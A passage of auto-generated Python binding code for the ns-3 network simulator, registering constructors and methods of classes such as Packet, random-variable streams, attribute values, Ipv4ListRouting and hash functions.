    ## node.h (module 'network'): void ns3::Node::DoDispose() [member function]
    cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True)
    ## node.h (module 'network'): void ns3::Node::DoInitialize() [member function]
    cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True)
    return

def register_Ns3NormalRandomVariable_methods(root_module, cls):
    """Register constructors, attributes and methods of ns3::NormalRandomVariable on *cls*."""
    ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::INFINITE_VALUE [variable]
    cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True)
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::NormalRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::NormalRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetMean() const [member function]
    cls.add_method('GetMean', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetVariance() const [member function]
    cls.add_method('GetVariance', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetBound() const [member function]
    cls.add_method('GetBound', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue(double mean, double variance, double bound=ns3::NormalRandomVariable::INFINITE_VALUE) [member function]
    cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'variance'), param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger(uint32_t mean, uint32_t variance, uint32_t bound) [member function]
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'variance'), param('uint32_t', 'bound')])
    ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
    """Register constructors of ns3::ObjectFactoryChecker on *cls*."""
    ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
    cls.add_constructor([])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
    return

def register_Ns3ObjectFactoryValue_methods(root_module, cls):
    """Register constructors and methods of ns3::ObjectFactoryValue on *cls*."""
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
    cls.add_constructor([])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
    ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
    cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
    ## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
    cls.add_method('Get', 'ns3::ObjectFactory', [], is_const=True)
    ## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::ObjectFactory const &', 'value')])
    return

def register_Ns3OutputStreamWrapper_methods(root_module, cls):
    """Register constructors and methods of ns3::OutputStreamWrapper on *cls*."""
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(ns3::OutputStreamWrapper const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::OutputStreamWrapper const &', 'arg0')])
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::string filename, std::_Ios_Openmode filemode) [constructor]
    cls.add_constructor([param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')])
    ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::ostream * os) [constructor]
    cls.add_constructor([param('std::ostream *', 'os')])
    ## output-stream-wrapper.h (module 'network'): std::ostream * ns3::OutputStreamWrapper::GetStream() [member function]
    cls.add_method('GetStream', 'std::ostream *', [])
    return

def register_Ns3Packet_methods(root_module, cls):
    """Register constructors, operators and methods of ns3::Packet on *cls*."""
    cls.add_output_stream_operator()
    ## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
    cls.add_constructor([])
    ## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
    cls.add_constructor([param('ns3::Packet const &', 'o')])
    ## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
    cls.add_constructor([param('uint32_t', 'size')])
    ## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
    cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
    ## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
    cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    ## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
    cls.add_method('AddAtEnd', 'void', [param('ns3::Ptr< ns3::Packet const >', 'packet')])
    ## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
    cls.add_method('AddByteTag', 'void', [param('ns3::Tag const &', 'tag')], is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
    cls.add_method('AddHeader', 'void', [param('ns3::Header const &', 'header')])
    ## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
    cls.add_method('AddPacketTag', 'void', [param('ns3::Tag const &', 'tag')], is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
    cls.add_method('AddPaddingAtEnd', 'void', [param('uint32_t', 'size')])
    ## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
    cls.add_method('AddTrailer', 'void', [param('ns3::Trailer const &', 'trailer')])
    ## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
    cls.add_method('BeginItem', 'ns3::PacketMetadata::ItemIterator', [], is_const=True)
    ## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::Packet >', [], is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
    cls.add_method('CopyData', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')], is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
    cls.add_method('CopyData', 'void', [param('std::ostream *', 'os'), param('uint32_t', 'size')], is_const=True)
    ## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
    cls.add_method('CreateFragment', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'start'), param('uint32_t', 'length')], is_const=True)
    ## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
    cls.add_method('EnableChecking', 'void', [], is_static=True)
    ## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
    cls.add_method('EnablePrinting', 'void', [], is_static=True)
    ## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
    cls.add_method('FindFirstMatchingByteTag', 'bool', [param('ns3::Tag &', 'tag')], is_const=True)
    ## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
    cls.add_method('GetByteTagIterator', 'ns3::ByteTagIterator', [], is_const=True)
    ## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
    cls.add_method('GetNixVector', 'ns3::Ptr< ns3::NixVector >', [], is_const=True)
    ## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
    cls.add_method('GetPacketTagIterator', 'ns3::PacketTagIterator', [], is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
    cls.add_method('GetSize', 'uint32_t', [], is_const=True)
    ## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
    cls.add_method('GetUid', 'uint64_t', [], is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
    cls.add_method('PeekHeader', 'uint32_t', [param('ns3::Header &', 'header')], is_const=True)
    ## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
    cls.add_method('PeekPacketTag', 'bool', [param('ns3::Tag &', 'tag')], is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
    cls.add_method('PeekTrailer', 'uint32_t', [param('ns3::Trailer &', 'trailer')])
    ## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
    cls.add_method('PrintByteTags', 'void', [param('std::ostream &', 'os')], is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
    cls.add_method('PrintPacketTags', 'void', [param('std::ostream &', 'os')], is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
    cls.add_method('RemoveAllByteTags', 'void', [])
    ## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
    cls.add_method('RemoveAllPacketTags', 'void', [])
    ## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
    cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'size')])
    ## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
    cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'size')])
    ## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
    cls.add_method('RemoveHeader', 'uint32_t', [param('ns3::Header &', 'header')])
    ## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
    cls.add_method('RemovePacketTag', 'bool', [param('ns3::Tag &', 'tag')])
    ## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
    cls.add_method('RemoveTrailer', 'uint32_t', [param('ns3::Trailer &', 'trailer')])
    ## packet.h (module 'network'): bool ns3::Packet::ReplacePacketTag(ns3::Tag & tag) [member function]
    cls.add_method('ReplacePacketTag', 'bool', [param('ns3::Tag &', 'tag')])
    ## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
    cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True)
    ## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> nixVector) [member function]
    cls.add_method('SetNixVector', 'void', [param('ns3::Ptr< ns3::NixVector >', 'nixVector')])
    ## packet.h (module 'network'): std::string ns3::Packet::ToString() const [member function]
    cls.add_method('ToString', 'std::string', [], is_const=True)
    return

def register_Ns3ParetoRandomVariable_methods(root_module, cls):
    """Register constructors and methods of ns3::ParetoRandomVariable on *cls*."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ParetoRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable::ParetoRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetMean() const [member function]
    cls.add_method('GetMean', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetShape() const [member function]
    cls.add_method('GetShape', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetBound() const [member function]
    cls.add_method('GetBound', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue(double mean, double shape, double bound) [member function]
    cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'shape'), param('double', 'bound')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger(uint32_t mean, uint32_t shape, uint32_t bound) [member function]
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
    ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3QueueItem_methods(root_module, cls):
    """Register constructors, operators and methods of ns3::QueueItem on *cls*."""
    cls.add_output_stream_operator()
    ## net-device.h (module 'network'): ns3::QueueItem::QueueItem(ns3::Ptr<ns3::Packet> p) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::Packet >', 'p')])
    ## net-device.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::QueueItem::GetPacket() const [member function]
    cls.add_method('GetPacket', 'ns3::Ptr< ns3::Packet >', [], is_const=True)
    ## net-device.h (module 'network'): uint32_t ns3::QueueItem::GetPacketSize() const [member function]
    cls.add_method('GetPacketSize', 'uint32_t', [], is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::QueueItem::GetUint8Value(ns3::QueueItem::Uint8Values field, uint8_t & value) const [member function]
    cls.add_method('GetUint8Value', 'bool', [param('ns3::QueueItem::Uint8Values', 'field'), param('uint8_t &', 'value')], is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): void ns3::QueueItem::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    return

def register_Ns3TimeValue_methods(root_module, cls):
    """Register constructors and methods of ns3::TimeValue on *cls*."""
    ## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
    cls.add_constructor([])
    ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
    ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
    cls.add_constructor([param('ns3::Time const &', 'value')])
    ## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
    cls.add_method('Get', 'ns3::Time', [], is_const=True)
    ## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::Time const &', 'value')])
    return

def register_Ns3TypeIdChecker_methods(root_module, cls):
    """Register constructors of ns3::TypeIdChecker on *cls*."""
    ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
    return

def register_Ns3TypeIdValue_methods(root_module, cls):
    """Register constructors and methods of ns3::TypeIdValue on *cls*."""
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
    ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
    cls.add_constructor([param('ns3::TypeId const &', 'value')])
    ## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
    cls.add_method('Get', 'ns3::TypeId', [], is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True,
is_virtual=True) ## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function] cls.add_method('Set', 'void', [param('ns3::TypeId const &', 'value')]) return def register_Ns3AddressChecker_methods(root_module, cls): ## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')]) return def register_Ns3AddressValue_methods(root_module, cls): ## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressValue const &', 'arg0')]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor] cls.add_constructor([param('ns3::Address const &', 'value')]) ## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Address', [], is_const=True) ## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker 
const >', 'checker')], is_const=True, is_virtual=True) ## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Address const &', 'value')]) return def register_Ns3Ipv4ListRouting_methods(root_module, cls): ## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting::Ipv4ListRouting(ns3::Ipv4ListRouting const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4ListRouting const &', 'arg0')]) ## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting::Ipv4ListRouting() [constructor] cls.add_constructor([]) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::AddRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol, int16_t priority) [member function] cls.add_method('AddRoutingProtocol', 'void', [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol'), param('int16_t', 'priority')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): uint32_t ns3::Ipv4ListRouting::GetNRoutingProtocols() const [member function] cls.add_method('GetNRoutingProtocols', 'uint32_t', [], is_const=True, is_virtual=True) ## ipv4-list-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4ListRouting::GetRoutingProtocol(uint32_t index, int16_t & priority) const [member function] cls.add_method('GetRoutingProtocol', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [param('uint32_t', 'index'), param('int16_t &', 'priority', direction=2)], is_const=True, is_virtual=True) ## ipv4-list-routing.h (module 'internet'): static ns3::TypeId ns3::Ipv4ListRouting::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 
'address')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyInterfaceDown(uint32_t interface) [member function] cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyInterfaceUp(uint32_t interface) [member function] cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function] cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_const=True, is_virtual=True) ## ipv4-list-routing.h (module 'internet'): bool ns3::Ipv4ListRouting::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const 
ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function] cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4ListRouting::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function] cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## 
ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3HashImplementation_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor] cls.add_constructor([]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_pure_virtual=True, is_virtual=True) ## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function] cls.add_method('clear', 'void', [], is_pure_virtual=True, is_virtual=True) return def register_Ns3HashFunctionFnv1a_methods(root_module, cls): ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')]) ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor] cls.add_constructor([]) ## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-fnv.h (module 'core'): uint64_t 
